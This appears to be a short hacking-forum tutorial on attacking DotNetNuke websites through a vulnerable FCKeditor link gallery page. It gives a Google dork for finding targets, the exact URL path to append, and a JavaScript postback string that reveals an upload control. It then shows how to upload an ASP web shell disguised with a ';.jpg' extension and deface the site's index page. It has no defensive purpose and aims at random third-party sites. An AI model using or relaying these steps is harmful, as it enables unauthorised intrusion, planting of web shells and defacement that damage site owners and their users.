You guys must be aware of Portal attack for hacking a website. Portal hacking A.K.A. DotNetNuke(DNN) attack.
So here it is, let’s start:
1. Open google.com and type”inurl:fcklinkgallery.aspx” (this is for searching sites which are vulnarable to this attack.
2. Now select any website from the list.
3. Now add ”/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx” after the name of your website in url bar.
4. You will get a link gallery page
5. Select "file”
6. Now copy this javascript in url bar.
javascript:__doPostBack('ctlURL$cmdUpload','')
7. Now you will see an upload option. Clck on that and upload your shell ASp
8. After upload
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
9. Now shell is in frot of you like this (screen shot)
10. Click again and again on <Dir>, untill you find admin.
11. When you see this page admin area, click on upload and upload your deface index page to be shown.
